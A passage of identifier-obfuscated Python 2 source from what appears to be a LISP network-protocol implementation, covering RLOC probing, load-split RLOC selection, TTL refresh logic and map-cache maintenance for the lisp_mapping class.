for O0OOOO0o0O , oOo , i11ii in lisp_rloc_probe_list [ oo0o00OO ] :
if ( oOo . is_exact_match ( eid ) and i11ii . is_exact_match ( group ) ) :
if ( O0OOOO0o0O == self ) :
if ( lisp_rloc_probe_list [ oo0o00OO ] == [ ] ) :
lisp_rloc_probe_list . pop ( oo0o00OO )
if 41 - 41: OoOoOO00 * i1IIi
return
if 94 - 94: I11i
lisp_rloc_probe_list [ oo0o00OO ] . remove ( [ O0OOOO0o0O , oOo , i11ii ] )
break
if 28 - 28: OOooOOo
if 82 - 82: II111iiii
lisp_rloc_probe_list [ oo0o00OO ] . append ( [ self , eid , group ] )
if 66 - 66: iII111i % I1Ii111 * oO0o
if 81 - 81: i11iIiiIii - O0 . iIii1I11I1II1 - I11i + iIii1I11I1II1
if 50 - 50: Oo0Ooo . OoO0O00 + i11iIiiIii / i11iIiiIii
if 27 - 27: OoOoOO00 - OoOoOO00 % II111iiii + i1IIi + I1IiiI
if 75 - 75: OoooooooOO . I11i - OoOoOO00
I1IIiIIIii = lisp_rloc_probe_list [ oo0o00OO ] [ 0 ] [ 0 ]
if ( I1IIiIIIii . state == LISP_RLOC_UNREACH_STATE ) :
self . state = LISP_RLOC_UNREACH_STATE
self . last_state_change = lisp_get_timestamp ( )
if 93 - 93: OoOoOO00 . I1Ii111 % I1ii11iIi11i
if 58 - 58: OoooooooOO . i1IIi . Oo0Ooo - o0oOOo0O0Ooo / oO0o * I1Ii111
if 6 - 6: oO0o - OoO0O00
def delete_from_rloc_probe_list ( self , eid , group ) :
oo0o00OO = self . rloc . print_address_no_iid ( )
Oo0O00O = self . translated_port
if ( Oo0O00O != 0 ) : oo0o00OO += ":" + str ( Oo0O00O )
if ( lisp_rloc_probe_list . has_key ( oo0o00OO ) == False ) : return
if 44 - 44: Oo0Ooo + I1ii11iIi11i % Oo0Ooo / I11i
oO00ooo = [ ]
for i1ii1i1Ii11 in lisp_rloc_probe_list [ oo0o00OO ] :
if ( i1ii1i1Ii11 [ 0 ] != self ) : continue
if ( i1ii1i1Ii11 [ 1 ] . is_exact_match ( eid ) == False ) : continue
if ( i1ii1i1Ii11 [ 2 ] . is_exact_match ( group ) == False ) : continue
oO00ooo = i1ii1i1Ii11
break
if 9 - 9: oO0o . i11iIiiIii * i11iIiiIii . I1ii11iIi11i + iII111i
if ( oO00ooo == [ ] ) : return
if 18 - 18: I11i
try :
lisp_rloc_probe_list [ oo0o00OO ] . remove ( oO00ooo )
if ( lisp_rloc_probe_list [ oo0o00OO ] == [ ] ) :
lisp_rloc_probe_list . pop ( oo0o00OO )
if 46 - 46: I1IiiI . OoooooooOO / iIii1I11I1II1 - ooOoO0o * OOooOOo
except :
return
if 55 - 55: o0oOOo0O0Ooo + iIii1I11I1II1 / I11i
if 97 - 97: i11iIiiIii
if 71 - 71: oO0o + Oo0Ooo
def print_rloc_probe_state ( self , trailing_linefeed ) :
Oo0Ooo0O0 = ""
I1IIiIIIii = self
while ( True ) :
iI1Ii = I1IIiIIIii . last_rloc_probe
if ( iI1Ii == None ) : iI1Ii = 0
OoO00o0Ooo0o = I1IIiIIIii . last_rloc_probe_reply
if ( OoO00o0Ooo0o == None ) : OoO00o0Ooo0o = 0
oo0000OoO = I1IIiIIIii . print_rloc_probe_rtt ( )
IiII1iiI = space ( 4 )
if 93 - 93: iIii1I11I1II1 - II111iiii
if ( I1IIiIIIii . rloc_next_hop == None ) :
Oo0Ooo0O0 += "RLOC-Probing:\n"
else :
OooOOOoOoo0O0 , o00O00oo0 = I1IIiIIIii . rloc_next_hop
Oo0Ooo0O0 += "RLOC-Probing for nh {}({}):\n" . format ( o00O00oo0 , OooOOOoOoo0O0 )
if 1 - 1: Ii1I / OoO0O00 % iIii1I11I1II1 / I1Ii111
if 31 - 31: I11i
Oo0Ooo0O0 += ( "{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + "received: {}, rtt {}" ) . format ( IiII1iiI , lisp_print_elapsed ( iI1Ii ) ,
# IiII . OoooooooOO + I1IiiI % OOooOOo + ooOoO0o . ooOoO0o
IiII1iiI , lisp_print_elapsed ( OoO00o0Ooo0o ) , oo0000OoO )
if 53 - 53: OoO0O00
if ( trailing_linefeed ) : Oo0Ooo0O0 += "\n"
if 58 - 58: I1IiiI / IiII - OoooooooOO - I1Ii111
I1IIiIIIii = I1IIiIIIii . next_rloc
if ( I1IIiIIIii == None ) : break
Oo0Ooo0O0 += "\n"
if 39 - 39: IiII . II111iiii
return ( Oo0Ooo0O0 )
if 42 - 42: I1ii11iIi11i . Oo0Ooo * I1IiiI / Oo0Ooo
if 83 - 83: i11iIiiIii / OoOoOO00
def get_encap_keys ( self ) :
Oo0O00O = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 37 - 37: iIii1I11I1II1 % IiII / i11iIiiIii - oO0o
oo0o00OO = self . rloc . print_address_no_iid ( ) + ":" + Oo0O00O
if 43 - 43: II111iiii - OoooooooOO
try :
iIi11III = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ]
if ( iIi11III [ 1 ] ) : return ( iIi11III [ 1 ] . encrypt_key , iIi11III [ 1 ] . icv_key )
return ( None , None )
except :
return ( None , None )
if 11 - 11: I1IiiI
if 76 - 76: iII111i - II111iiii % Oo0Ooo . I1Ii111
if 64 - 64: OoO0O00 - OoO0O00
def rloc_recent_rekey ( self ) :
Oo0O00O = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 93 - 93: Oo0Ooo . O0
oo0o00OO = self . rloc . print_address_no_iid ( ) + ":" + Oo0O00O
if 75 - 75: iII111i * II111iiii - I1IiiI
try :
Oo000O000 = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ] [ 1 ]
if ( Oo000O000 == None ) : return ( False )
if ( Oo000O000 . last_rekey == None ) : return ( True )
return ( time . time ( ) - Oo000O000 . last_rekey < 1 )
except :
return ( False )
if 30 - 30: i1IIi / ooOoO0o . ooOoO0o
if 22 - 22: I11i % iIii1I11I1II1 - i11iIiiIii * OoOoOO00 - I1Ii111
if 97 - 97: i11iIiiIii . OoOoOO00 + oO0o * O0 % OoO0O00 - Ii1I
if 46 - 46: I1Ii111
class lisp_mapping ( ) :
def __init__ ( self , eid , group , rloc_set ) :
self . eid = eid
if ( eid == "" ) : self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = group
if ( group == "" ) : self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_set = rloc_set
self . best_rloc_set = [ ]
self . build_best_rloc_set ( )
self . uptime = lisp_get_timestamp ( )
self . action = LISP_NO_ACTION
self . expires = None
self . map_cache_ttl = None
self . last_refresh_time = self . uptime
self . source_cache = None
self . map_replies_sent = 0
self . mapping_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . use_mr_name = "all"
self . use_ms_name = "all"
self . stats = lisp_stats ( )
self . dynamic_eids = None
self . checkpoint_entry = False
self . secondary_iid = None
self . signature_eid = False
self . gleaned = False
self . recent_sources = { }
self . last_multicast_map_request = 0
if 87 - 87: o0oOOo0O0Ooo - iII111i * OoO0O00 * o0oOOo0O0Ooo . o0oOOo0O0Ooo / OOooOOo
if 50 - 50: i11iIiiIii - II111iiii * OoooooooOO + II111iiii - ooOoO0o
def print_mapping ( self , eid_indent , rloc_indent ) :
i1 = lisp_print_elapsed ( self . uptime )
IIi1iiIII11 = "" if self . group . is_null ( ) else ", group {}" . format ( self . group . print_prefix ( ) )
if 52 - 52: i1IIi + i1IIi * i1IIi / OoOoOO00
lprint ( "{}eid {}{}, uptime {}, {} rlocs:" . format ( eid_indent ,
green ( self . eid . print_prefix ( ) , False ) , IIi1iiIII11 , i1 ,
len ( self . rloc_set ) ) )
for I1IIiIIIii in self . rloc_set : I1IIiIIIii . print_rloc ( rloc_indent )
if 98 - 98: iII111i . i1IIi + o0oOOo0O0Ooo * OoooooooOO - i11iIiiIii
if 21 - 21: i11iIiiIii . oO0o * o0oOOo0O0Ooo + Oo0Ooo * OoOoOO00 * o0oOOo0O0Ooo
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 33 - 33: I1IiiI + O0 - I11i
if 90 - 90: I1Ii111 * OoooooooOO . iIii1I11I1II1 % OoO0O00 / I11i + iII111i
def print_ttl ( self ) :
oOoooOOO0o0 = self . map_cache_ttl
if ( oOoooOOO0o0 == None ) : return ( "forever" )
if 63 - 63: o0oOOo0O0Ooo . IiII . Oo0Ooo - iIii1I11I1II1 / I1Ii111
if ( oOoooOOO0o0 >= 3600 ) :
if ( ( oOoooOOO0o0 % 3600 ) == 0 ) :
oOoooOOO0o0 = str ( oOoooOOO0o0 / 3600 ) + " hours"
else :
oOoooOOO0o0 = str ( oOoooOOO0o0 * 60 ) + " mins"
if 66 - 66: ooOoO0o * I1Ii111 - II111iiii
elif ( oOoooOOO0o0 >= 60 ) :
if ( ( oOoooOOO0o0 % 60 ) == 0 ) :
oOoooOOO0o0 = str ( oOoooOOO0o0 / 60 ) + " mins"
else :
oOoooOOO0o0 = str ( oOoooOOO0o0 ) + " secs"
if 38 - 38: O0 % I1ii11iIi11i + O0
else :
oOoooOOO0o0 = str ( oOoooOOO0o0 ) + " secs"
if 37 - 37: Oo0Ooo / I1IiiI
return ( oOoooOOO0o0 )
if 23 - 23: II111iiii / iII111i
if 55 - 55: i11iIiiIii - Ii1I % OoooooooOO * OoooooooOO
def refresh ( self ) :
if ( self . group . is_null ( ) ) : return ( self . refresh_unicast ( ) )
return ( self . refresh_multicast ( ) )
if 92 - 92: iIii1I11I1II1
if 47 - 47: Oo0Ooo + Oo0Ooo * ooOoO0o - OoOoOO00 + II111iiii
def refresh_unicast ( self ) :
return ( self . is_active ( ) and self . has_ttl_elapsed ( ) and
self . gleaned == False )
if 10 - 10: II111iiii / ooOoO0o . Ii1I / I1Ii111 / oO0o
if 8 - 8: OOooOOo / ooOoO0o * I11i + OOooOOo * i1IIi
def refresh_multicast ( self ) :
if 48 - 48: o0oOOo0O0Ooo - I1ii11iIi11i / iII111i
if 63 - 63: O0 - IiII . OOooOOo % IiII . I1IiiI / oO0o
if 79 - 79: OoOoOO00
if 88 - 88: oO0o * o0oOOo0O0Ooo
if 5 - 5: I11i - I1Ii111 * I11i - II111iiii + OOooOOo + II111iiii
oO000o0Oo00 = int ( ( time . time ( ) - self . uptime ) % self . map_cache_ttl )
OoOOOO = ( oO000o0Oo00 in [ 0 , 1 , 2 ] )
if ( OoOOOO == False ) : return ( False )
if 86 - 86: O0 / Ii1I . OoooooooOO . O0
if 87 - 87: Ii1I + o0oOOo0O0Ooo + OoooooooOO . Ii1I
if 73 - 73: o0oOOo0O0Ooo + OoooooooOO - I1Ii111 . iIii1I11I1II1
if 25 - 25: OoooooooOO % I1ii11iIi11i % Oo0Ooo % i11iIiiIii
ii1i1iiI1 = ( ( time . time ( ) - self . last_multicast_map_request ) <= 2 )
if ( ii1i1iiI1 ) : return ( False )
if 19 - 19: II111iiii / OoO0O00 * II111iiii + I1IiiI
self . last_multicast_map_request = lisp_get_timestamp ( )
return ( True )
if 28 - 28: OOooOOo + OoO0O00 * Ii1I * O0 / I1IiiI
if 99 - 99: Oo0Ooo + ooOoO0o - I1ii11iIi11i + I1Ii111 + Ii1I * I1IiiI
def has_ttl_elapsed ( self ) :
if ( self . map_cache_ttl == None ) : return ( False )
oO000o0Oo00 = time . time ( ) - self . last_refresh_time
if ( oO000o0Oo00 >= self . map_cache_ttl ) : return ( True )
if 68 - 68: OoO0O00
if 79 - 79: Ii1I . IiII + OoOoOO00
if 10 - 10: OoooooooOO * iII111i * ooOoO0o . Ii1I % I1Ii111 / I1ii11iIi11i
if 71 - 71: Ii1I + IiII
if 10 - 10: II111iiii % o0oOOo0O0Ooo . o0oOOo0O0Ooo % iII111i
Ii111 = self . map_cache_ttl - ( self . map_cache_ttl / 10 )
if ( oO000o0Oo00 >= Ii111 ) : return ( True )
return ( False )
if 40 - 40: oO0o
if 4 - 4: o0oOOo0O0Ooo + I1IiiI - O0 - iIii1I11I1II1
def is_active ( self ) :
if ( self . stats . last_increment == None ) : return ( False )
oO000o0Oo00 = time . time ( ) - self . stats . last_increment
return ( oO000o0Oo00 <= 60 )
if 56 - 56: OOooOOo * o0oOOo0O0Ooo - O0
if 45 - 45: OOooOOo - OoO0O00
def match_eid_tuple ( self , db ) :
if ( self . eid . is_exact_match ( db . eid ) == False ) : return ( False )
if ( self . group . is_exact_match ( db . group ) == False ) : return ( False )
return ( True )
if 49 - 49: OoOoOO00 / o0oOOo0O0Ooo % OoO0O00
if 50 - 50: iIii1I11I1II1 - OoooooooOO + I1ii11iIi11i / Oo0Ooo * OOooOOo
def sort_rloc_set ( self ) :
self . rloc_set . sort ( key = operator . attrgetter ( 'rloc.address' ) )
if 37 - 37: O0 % I1Ii111 * OOooOOo / OOooOOo
if 95 - 95: I1ii11iIi11i % o0oOOo0O0Ooo . oO0o
def delete_rlocs_from_rloc_probe_list ( self ) :
for I1IIiIIIii in self . best_rloc_set :
I1IIiIIIii . delete_from_rloc_probe_list ( self . eid , self . group )
if 9 - 9: OoOoOO00 % OoOoOO00 * ooOoO0o / I1IiiI - OOooOOo
if 62 - 62: Oo0Ooo + OOooOOo - Oo0Ooo
if 32 - 32: OoooooooOO
def build_best_rloc_set ( self ) :
OooOoO0OOoo = self . best_rloc_set
self . best_rloc_set = [ ]
if ( self . rloc_set == None ) : return
if 90 - 90: OoOoOO00 % OoO0O00 . I1IiiI * oO0o
if 17 - 17: O0 - i1IIi
if 77 - 77: OOooOOo - i1IIi / II111iiii . I1Ii111 + O0
if 1 - 1: OoooooooOO % iIii1I11I1II1 * I1ii11iIi11i
i11iIiiI1i1i1 = 256
for I1IIiIIIii in self . rloc_set :
if ( I1IIiIIIii . up_state ( ) ) : i11iIiiI1i1i1 = min ( I1IIiIIIii . priority , i11iIiiI1i1i1 )
if 80 - 80: Oo0Ooo
if 37 - 37: i11iIiiIii - I1Ii111
if 50 - 50: I1IiiI / Ii1I / Ii1I + O0 % I11i - i1IIi
if 72 - 72: II111iiii . OoO0O00 . II111iiii * I1ii11iIi11i
if 42 - 42: II111iiii
if 45 - 45: I1ii11iIi11i . I1Ii111 . i1IIi * OOooOOo
if 53 - 53: Ii1I . i11iIiiIii + o0oOOo0O0Ooo % I11i - I1ii11iIi11i * I1ii11iIi11i
if 87 - 87: I1Ii111 % i11iIiiIii + O0
if 67 - 67: OoooooooOO / i1IIi / ooOoO0o . i1IIi - i11iIiiIii . i1IIi
if 41 - 41: i11iIiiIii / ooOoO0o - Ii1I + I11i
for I1IIiIIIii in self . rloc_set :
if ( I1IIiIIIii . priority <= i11iIiiI1i1i1 ) :
if ( I1IIiIIIii . unreach_state ( ) and I1IIiIIIii . last_rloc_probe == None ) :
I1IIiIIIii . last_rloc_probe = lisp_get_timestamp ( )
if 15 - 15: I1ii11iIi11i
self . best_rloc_set . append ( I1IIiIIIii )
if 22 - 22: iIii1I11I1II1 - i1IIi - i11iIiiIii / I1IiiI + o0oOOo0O0Ooo
if 56 - 56: I1IiiI . ooOoO0o
if 35 - 35: iIii1I11I1II1 % Oo0Ooo + o0oOOo0O0Ooo * o0oOOo0O0Ooo % ooOoO0o
if 10 - 10: I1ii11iIi11i / II111iiii % II111iiii - OoooooooOO * o0oOOo0O0Ooo / ooOoO0o
if 26 - 26: OoO0O00 . O0 * iII111i % OoOoOO00 % iIii1I11I1II1
if 37 - 37: iII111i - ooOoO0o * Ii1I + II111iiii * i11iIiiIii
if 8 - 8: OoooooooOO % I11i - iII111i * OOooOOo . O0
if 40 - 40: I1Ii111 . oO0o + OoO0O00 % Oo0Ooo / II111iiii
for I1IIiIIIii in OooOoO0OOoo :
if ( I1IIiIIIii . priority < i11iIiiI1i1i1 ) : continue
I1IIiIIIii . delete_from_rloc_probe_list ( self . eid , self . group )
if 19 - 19: i11iIiiIii
for I1IIiIIIii in self . best_rloc_set :
if ( I1IIiIIIii . rloc . is_null ( ) ) : continue
I1IIiIIIii . add_to_rloc_probe_list ( self . eid , self . group )
if 20 - 20: i11iIiiIii . II111iiii - I1ii11iIi11i / ooOoO0o % i11iIiiIii
if 35 - 35: Oo0Ooo - I1ii11iIi11i . Oo0Ooo
if 13 - 13: II111iiii / OoOoOO00 * iII111i % O0 % I1ii11iIi11i * i11iIiiIii
def select_rloc ( self , lisp_packet , ipc_socket ) :
IiiiIi1iiii11 = lisp_packet . packet
ooO00O = lisp_packet . inner_version
IiiI1iii1iIiiI = len ( self . best_rloc_set )
if ( IiiI1iii1iIiiI == 0 ) :
self . stats . increment ( len ( IiiiIi1iiii11 ) )
return ( [ None , None , None , self . action , None , None ] )
if 58 - 58: OoO0O00
if 48 - 48: oO0o . II111iiii
oOOO0O0ooOoOoo0 = 4 if lisp_load_split_pings else 0
IIi1iiIIi1i = lisp_packet . hash_ports ( )
if ( ooO00O == 4 ) :
for IiIIi1IiiIiI in range ( 8 + oOOO0O0ooOoOoo0 ) :
IIi1iiIIi1i = IIi1iiIIi1i ^ struct . unpack ( "B" , IiiiIi1iiii11 [ IiIIi1IiiIiI + 12 ] ) [ 0 ]
if 73 - 73: OoOoOO00
elif ( ooO00O == 6 ) :
for IiIIi1IiiIiI in range ( 0 , 32 + oOOO0O0ooOoOoo0 , 4 ) :
IIi1iiIIi1i = IIi1iiIIi1i ^ struct . unpack ( "I" , IiiiIi1iiii11 [ IiIIi1IiiIiI + 8 : IiIIi1IiiIiI + 12 ] ) [ 0 ]
if 42 - 42: I1ii11iIi11i - iIii1I11I1II1 . Ii1I % OoO0O00 % i11iIiiIii * i11iIiiIii
IIi1iiIIi1i = ( IIi1iiIIi1i >> 16 ) + ( IIi1iiIIi1i & 0xffff )
IIi1iiIIi1i = ( IIi1iiIIi1i >> 8 ) + ( IIi1iiIIi1i & 0xff )
else :
for IiIIi1IiiIiI in range ( 0 , 12 + oOOO0O0ooOoOoo0 , 4 ) :
IIi1iiIIi1i = IIi1iiIIi1i ^ struct . unpack ( "I" , IiiiIi1iiii11 [ IiIIi1IiiIiI : IiIIi1IiiIiI + 4 ] ) [ 0 ]
if 86 - 86: Oo0Ooo % iIii1I11I1II1 . II111iiii / I11i % OoO0O00 % OoO0O00
if 40 - 40: o0oOOo0O0Ooo . iIii1I11I1II1 * Oo0Ooo * i1IIi
if 94 - 94: oO0o - II111iiii + OoOoOO00
if ( lisp_data_plane_logging ) :
oOOO000 = [ ]
for O0OOOO0o0O in self . best_rloc_set :
if ( O0OOOO0o0O . rloc . is_null ( ) ) : continue
oOOO000 . append ( [ O0OOOO0o0O . rloc . print_address_no_iid ( ) , O0OOOO0o0O . print_state ( ) ] )
if 72 - 72: iIii1I11I1II1 % I1Ii111
dprint ( "Packet hash {}, index {}, best-rloc-list: {}" . format ( hex ( IIi1iiIIi1i ) , IIi1iiIIi1i % IiiI1iii1iIiiI , red ( str ( oOOO000 ) , False ) ) )
if 77 - 77: I1Ii111 * I1IiiI / iIii1I11I1II1 . II111iiii * Oo0Ooo
if 71 - 71: ooOoO0o / iIii1I11I1II1 % O0 / I1ii11iIi11i . I1Ii111 / i11iIiiIii
if 6 - 6: oO0o . OoO0O00 - II111iiii . I1IiiI - o0oOOo0O0Ooo - i1IIi
if 42 - 42: Ii1I + i11iIiiIii
if 46 - 46: O0 % OoOoOO00 - I1Ii111 . I1IiiI
if 66 - 66: II111iiii * iIii1I11I1II1 * ooOoO0o * I11i . II111iiii - ooOoO0o
I1IIiIIIii = self . best_rloc_set [ IIi1iiIIi1i % IiiI1iii1iIiiI ]
if 15 - 15: I1ii11iIi11i - i11iIiiIii - Ii1I / Ii1I . iII111i
if 36 - 36: oO0o + Oo0Ooo * I1Ii111 % OOooOOo . Oo0Ooo . I1IiiI
if 81 - 81: o0oOOo0O0Ooo . OoOoOO00 . i11iIiiIii
if 13 - 13: i1IIi
if 70 - 70: O0 / II111iiii
ii1 = lisp_get_echo_nonce ( I1IIiIIIii . rloc , None )
if ( ii1 ) :
ii1 . change_state ( I1IIiIIIii )
if ( I1IIiIIIii . no_echoed_nonce_state ( ) ) :
ii1 . request_nonce_sent = None
if 98 - 98: OoOoOO00 - O0 . O0 + ooOoO0o * iIii1I11I1II1
if 7 - 7: IiII * OoOoOO00 + iIii1I11I1II1 / OoOoOO00 + Oo0Ooo / o0oOOo0O0Ooo
if 77 - 77: i1IIi . I1IiiI
if 59 - 59: O0 + OoooooooOO - i1IIi
if 87 - 87: IiII * OoooooooOO / Oo0Ooo % iIii1I11I1II1 % oO0o
if 97 - 97: ooOoO0o % i1IIi . IiII / Oo0Ooo . I1Ii111 . OoO0O00
if ( I1IIiIIIii . up_state ( ) == False ) :
i1iIiI = IIi1iiIIi1i % IiiI1iii1iIiiI
ooo = ( i1iIiI + 1 ) % IiiI1iii1iIiiI
while ( ooo != i1iIiI ) :
I1IIiIIIii = self . best_rloc_set [ ooo ]
if ( I1IIiIIIii . up_state ( ) ) : break
ooo = ( ooo + 1 ) % IiiI1iii1iIiiI
if 22 - 22: i11iIiiIii * II111iiii
if ( ooo == i1iIiI ) :
self . build_best_rloc_set ( )
return ( [ None , None , None , None , None , None ] )
if 11 - 11: Oo0Ooo % i1IIi
if 70 - 70: II111iiii * Oo0Ooo * OOooOOo - I1IiiI + iIii1I11I1II1 + ooOoO0o
if 27 - 27: I1ii11iIi11i - I1Ii111 * O0 % ooOoO0o / I1IiiI
if 53 - 53: i11iIiiIii * i11iIiiIii % O0 % IiII
if 57 - 57: I1IiiI % i1IIi * OoO0O00 + I1Ii111 . I11i % I11i
if 69 - 69: I1ii11iIi11i / OoOoOO00 + iIii1I11I1II1
I1IIiIIIii . stats . increment ( len ( IiiiIi1iiii11 ) )
if 8 - 8: OoooooooOO
if 72 - 72: OoooooooOO % I1ii11iIi11i - OoO0O00 . OoooooooOO
if 83 - 83: o0oOOo0O0Ooo * Ii1I - Oo0Ooo * iII111i - i11iIiiIii
if 6 - 6: I1IiiI + i11iIiiIii + O0 / i1IIi
if ( I1IIiIIIii . rle_name and I1IIiIIIii . rle == None ) :
if ( lisp_rle_list . has_key ( I1IIiIIIii . rle_name ) ) :
I1IIiIIIii . rle = lisp_rle_list [ I1IIiIIIii . rle_name ]
if 50 - 50: iII111i . II111iiii % I1Ii111 % I1IiiI / o0oOOo0O0Ooo . I1IiiI
if 76 - 76: OOooOOo % iII111i
if ( I1IIiIIIii . rle ) : return ( [ None , None , None , None , I1IIiIIIii . rle , None ] )
if 80 - 80: iIii1I11I1II1 + o0oOOo0O0Ooo + iIii1I11I1II1
if 63 - 63: OoOoOO00 - o0oOOo0O0Ooo % II111iiii - Ii1I
if 81 - 81: iII111i % OOooOOo * oO0o
if 84 - 84: iII111i - OoooooooOO + I1ii11iIi11i - I1IiiI
if ( I1IIiIIIii . elp and I1IIiIIIii . elp . use_elp_node ) :
return ( [ I1IIiIIIii . elp . use_elp_node . address , None , None , None , None ,
None ] )
if 52 - 52: oO0o / ooOoO0o / iII111i / OoOoOO00 * iIii1I11I1II1
if 74 - 74: oO0o . I1ii11iIi11i - iIii1I11I1II1
if 73 - 73: OoO0O00 / O0 . o0oOOo0O0Ooo
if 100 - 100: Ii1I . OoO0O00 % I1ii11iIi11i % O0 * Oo0Ooo - OoOoOO00
if 15 - 15: OOooOOo - OOooOOo - OoooooooOO * OoO0O00
Iii1111IIiI1 = None if ( I1IIiIIIii . rloc . is_null ( ) ) else I1IIiIIIii . rloc
Oo0O00O = I1IIiIIIii . translated_port
I11I1iI = self . action if ( Iii1111IIiI1 == None ) else None
if 48 - 48: I1Ii111 * iII111i
if 93 - 93: I11i % iIii1I11I1II1 + Ii1I - I1IiiI + OoooooooOO . IiII
if 77 - 77: i11iIiiIii . OoooooooOO % iIii1I11I1II1 % I1Ii111
if 22 - 22: iIii1I11I1II1 + Ii1I / OOooOOo - oO0o * oO0o / IiII
if 91 - 91: I11i - II111iiii + o0oOOo0O0Ooo + i1IIi + I1ii11iIi11i % Ii1I
Iii11I = None
if ( ii1 and ii1 . request_nonce_timeout ( ) == False ) :
Iii11I = ii1 . get_request_or_echo_nonce ( ipc_socket , Iii1111IIiI1 )
if 57 - 57: o0oOOo0O0Ooo - I1Ii111 / OoooooooOO . OoooooooOO
if 44 - 44: oO0o / II111iiii % I1IiiI - II111iiii / OoooooooOO
if 4 - 4: I11i * OoOoOO00
if 18 - 18: iIii1I11I1II1 % OOooOOo - I1ii11iIi11i * i1IIi + Oo0Ooo
if 87 - 87: oO0o . I11i
return ( [ Iii1111IIiI1 , Oo0O00O , Iii11I , I11I1iI , None , I1IIiIIIii ] )
if 15 - 15: oO0o
if 45 - 45: Oo0Ooo * IiII * OoO0O00 + iIii1I11I1II1
def do_rloc_sets_match ( self , rloc_address_set ) :
if ( len ( self . rloc_set ) != len ( rloc_address_set ) ) : return ( False )
if 89 - 89: IiII . IiII . oO0o % iII111i
if 27 - 27: OoOoOO00 + O0 % i1IIi - Oo0Ooo
if 96 - 96: O0 % o0oOOo0O0Ooo + OOooOOo % I1IiiI
if 51 - 51: i1IIi . o0oOOo0O0Ooo % I1IiiI - OoooooooOO / OoOoOO00 - I11i
if 45 - 45: O0 * II111iiii / i11iIiiIii
for i1III111 in self . rloc_set :
for I1IIiIIIii in rloc_address_set :
if ( I1IIiIIIii . is_exact_match ( i1III111 . rloc ) == False ) : continue
I1IIiIIIii = None
break
if 38 - 38: OoooooooOO % i11iIiiIii - O0 / O0
if ( I1IIiIIIii == rloc_address_set [ - 1 ] ) : return ( False )
if 59 - 59: OoO0O00 % iII111i + oO0o * II111iiii . OOooOOo
return ( True )
if 26 - 26: OOooOOo % OoooooooOO . Ii1I / iIii1I11I1II1 * I1IiiI
if 85 - 85: IiII / Ii1I - I1ii11iIi11i * OOooOOo
def get_rloc ( self , rloc ) :
for i1III111 in self . rloc_set :
O0OOOO0o0O = i1III111 . rloc
if ( rloc . is_exact_match ( O0OOOO0o0O ) ) : return ( i1III111 )
if 19 - 19: I1ii11iIi11i
return ( None )
if 12 - 12: ooOoO0o * I1ii11iIi11i * O0 / oO0o + iII111i - iIii1I11I1II1
if 81 - 81: Ii1I
def get_rloc_by_interface ( self , interface ) :
for i1III111 in self . rloc_set :
if ( i1III111 . interface == interface ) : return ( i1III111 )
if 87 - 87: O0 % iII111i
return ( None )
if 57 - 57: Ii1I
if 49 - 49: I11i
def add_db ( self ) :
if ( self . group . is_null ( ) ) :
lisp_db_for_lookups . add_cache ( self . eid , self )
else :
ooOOo0ooo = lisp_db_for_lookups . lookup_cache ( self . group , True )
if ( ooOOo0ooo == None ) :
ooOOo0ooo = lisp_mapping ( self . group , self . group , [ ] )
lisp_db_for_lookups . add_cache ( self . group , ooOOo0ooo )
if 22 - 22: Oo0Ooo % OOooOOo + O0 - OoO0O00 % I11i * O0
ooOOo0ooo . add_source_entry ( self )
if 42 - 42: O0
if 55 - 55: i11iIiiIii % OOooOOo
if 10 - 10: OoOoOO00 / i11iIiiIii
def add_cache ( self , do_ipc = True ) :
if ( self . group . is_null ( ) ) :
lisp_map_cache . add_cache ( self . eid , self )
if ( lisp_program_hardware ) : lisp_program_vxlan_hardware ( self )
else :
o0o000Oo = lisp_map_cache . lookup_cache ( self . group , True )
if ( o0o000Oo == None ) :
o0o000Oo = lisp_mapping ( self . group , self . group , [ ] )
o0o000Oo . eid . copy_address ( self . group )
o0o000Oo . group . copy_address ( self . group )
lisp_map_cache . add_cache ( self . group , o0o000Oo )
if 21 - 21: Ii1I - i1IIi / I11i + IiII
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( o0o000Oo . group )
o0o000Oo . add_source_entry ( self )
if 44 - 44: OoooooooOO % I11i / O0
if ( do_ipc ) : lisp_write_ipc_map_cache ( True , self )
if 94 - 94: IiII
if 83 - 83: OoO0O00
def delete_cache ( self ) :
self . delete_rlocs_from_rloc_probe_list ( )
lisp_write_ipc_map_cache ( False , self )
if 55 - 55: iII111i
if ( self . group . is_null ( ) ) :
lisp_map_cache . delete_cache ( self . eid )
if ( lisp_program_hardware ) :
IIII1 = self . eid . print_prefix_no_iid ( )
os . system ( "ip route delete {}" . format ( IIII1 ) )
if 73 - 73: o0oOOo0O0Ooo + i11iIiiIii / ooOoO0o * II111iiii * o0oOOo0O0Ooo % iII111i
else :
o0o000Oo = lisp_map_cache . lookup_cache ( self . group , True )
if ( o0o000Oo == None ) : return
if 44 - 44: IiII * OoOoOO00 - OoO0O00 - OoooooooOO - I1ii11iIi11i - II111iiii
I1iiI1iI1 = o0o000Oo . lookup_source_cache ( self . eid , True )
if ( I1iiI1iI1 == None ) : return
if 27 - 27: I11i % Ii1I / iII111i . OoOoOO00
o0o000Oo . source_cache . delete_cache ( self . eid )
if ( o0o000Oo . source_cache . cache_size ( ) == 0 ) :
lisp_map_cache . delete_cache ( self . group )
if 88 - 88: iII111i - i11iIiiIii * I1Ii111 * i11iIiiIii - O0
if 8 - 8: oO0o + O0
if 52 - 52: I11i * OOooOOo - OoOoOO00 % iIii1I11I1II1 . II111iiii
if 1 - 1: OOooOOo / I1IiiI / Ii1I * iII111i
def add_source_entry ( self , source_mc ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_mc . eid , source_mc )
if 14 - 14: ooOoO0o . O0 * OOooOOo
if 34 - 34: I1ii11iIi11i . OOooOOo + OoO0O00 % o0oOOo0O0Ooo * O0 * I1IiiI
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 9 - 9: IiII / i11iIiiIii . o0oOOo0O0Ooo - OOooOOo % I1Ii111
if 65 - 65: I1IiiI % OoOoOO00
def dynamic_eid_configured ( self ) :
